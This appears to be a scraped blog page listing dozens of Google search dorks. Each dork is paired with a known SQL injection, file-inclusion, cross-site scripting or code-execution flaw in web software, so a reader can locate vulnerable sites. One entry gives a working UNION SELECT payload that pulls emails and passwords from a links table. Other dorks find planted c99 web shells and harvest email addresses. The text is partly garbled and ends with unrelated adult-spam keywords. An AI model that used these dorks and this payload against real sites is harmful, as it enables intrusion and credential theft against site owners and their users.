Link: Traffic Stats SQL Injection Vulnerbility
--------------------------------------------------------------------------------
Dork:
1) inurlCant See Imagesafiledb.php?action=search
2) intext:"Powered by paFileDB" intitleCant See ImagesaFileDB
Link: paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: allinurl:directory.php?ax=list
Author: proxyakabran
SQL Injection:
/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E, email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12, 13/**/from/**/links/*
--------------------------------------------------------------------------------
Dork: intitle:"SiteScape Forum Login"
Link: SiteScape Forum Multiple Unspecified Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"mimic2.cgi"
Link: Mimicboard2 Mimic2.Dat Unauthorized Access Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by Calendar Express 2"
Link: Calendar Express Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by Discus" inurl:/discus/
Link: DiscusWare Discus Error Message Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by WebMatic" (only 99 results)
Link: Webmatic Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by MKPortal"
Link: MkPortal Multiple SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:mailmachine.cgi intext:"Mail Machine v3" (only 11 results)
Link: Mail Machine Local File Include Exploit
--------------------------------------------------------------------------------
Dork: inurlCant See Imagesictionary.aspx intitleCant See Imagesictionary.aspx
Link: HomestayFinder's Dictionary.aspx XSS vuln.
--------------------------------------------------------------------------------
Dork: ":80" ":8080" -intext:a* filetype:txt
Author: florence
Finds lists of proxies.
--------------------------------------------------------------------------------
Dork: intitle:"Aigaion * Please login" *(only 6 found)
Link: Aigaion <= 1.3.3 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:htmltonuke.php?
Link: PHP-Nuke RFI Exploit
--------------------------------------------------------------------------------
Dork: "Powered by PHP Director" inurl:videos.php
Link: PHP Director Videos.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpwcms ** web based content management system"
Link: PHPWCMS Multiple Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"powered by easybe." (only 6 results)
Link: Easybe 1-2-3 Music Store Process.PHP Script SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"phpBook Ver" inurl:guestbook.php intitle:"Guestbook"
Link: NETonE PHPBook Guestbook.PHP Cross Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Login to Webmin" inurl:10000
Link: Webmin Pam_Login.CGI Multiple Unspecified Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"spellchecktext.php" OR inurl:"spellcheckwindow.php" (only 10 results)
Link: SPHPell Multiple Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) inurl:index.php?name=PNphpBB2 inurl:viewforum
2) intext:"Powered by PNphpBB2"
Link: PNphpBB2 "viewforum.php" SQL Injection Blind Password Hash Fishing Exploit
--------------------------------------------------------------------------------
Dork: intext:"Powered by EQdkp" inurl:"login.php"
Link: EQDKP Login.PHP Arbitrary Variable Overwrite Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Wheatblog"
Link: Wheatblog Login SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpEventCalendar: Event Display"
Link: phpEventCalendar <= v0.2.3 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: inurl:forum.php "Powered by VBZooM"
Link: vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:c99shell filetypeCant See Imageshp
--------------------------------------------------------------------------------
Dork: intitle:"WebChat" inurl:"/webchat/login.php
Link: WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"powered by e107" inurl:signup.php
Link: E107 Signup.PHP Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"phpTrafficA ** web statistics"
Link: phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"Welcome to LMS" intext:"Please login"
Link: LMS - LAN Management System 1.9.6 - RFI
--------------------------------------------------------------------------------
Dork: intitle:"Blackboard Academic Suite"
Link: Blackboard Products Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intitle:"Blackboard Learning System" inurl:/login/
Link: Blackboard Products Multiple HTML Injection Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by WMS-CMS" inurl:default.asp
Link: WMSCMS Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:/xmlrp.php intext:"Warning:" intext:"wp-config.php"
Link: Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intext:"Software PBLang" inurl:"login.php "intitle:log in"
Link: PBLang <= 4.67.16.a Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: intext:Powered by EQdkp inurl:listmembers.php
Link: EQdkp <= 1.3.2 SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intitle:sendcard - a PHP postcard script using a database to store the cards"
Link: Sendcard <= 3.4.1 Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: inurl:/cpCommerce/category.php
Link: cpCommerce <= 1.1.0 (category.php id_category) Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: intext:"Powered by Particle Gallery"
Link: Particle Gallery Search.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Powered by Particle Blogger"
Link: Particle Blogger Archives.PHP SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork: OTRS :: Login intext:"Powered by OTRS"
Link: OTRS Index.PL Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"Vistered Little Theme by"
Link: Vistered Little 1.6a Remote File Disclosure Vulnerability
--------------------------------------------------------------------------------
Dork: intext:Powered by phpCodeur © 2002–2006 | Wanewsletter
Link: WAnewsletter-2.1.3 (newsletter.php) RFI Vul
--------------------------------------------------------------------------------
Dork: intitleCant See ImageshpPgAdmin - Login
Link: ********** code Injection in phpPgAdmin
--------------------------------------------------------------------------------
Dork: intext:SquirrelMail Login
Link: SquirrelMail Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:Powered by Geeklog inurl:album.php
Link: Media Gallery =>v1.4 Remote file inclusion
--------------------------------------------------------------------------------
Dork: Powered By Pligg intext:Beta 9 / Login
Link: Pligg Reset Forgotten Password Security Bypass Vulnerability
--------------------------------------------------------------------------------
Dork: mailto:*@aol.com
Helps find usernames on a certain domain, replace aol.com
--------------------------------------------------------------------------------
Dork: intext:GNUTURK PORTAL inurl:Mods.PHP
Link: GNUTurk Mods.PHP Cross Site Scripting Vulnerability
truyen sex
wap sex
anh sex
hinh sex
Đăng ký:
Bài đăng (Atom)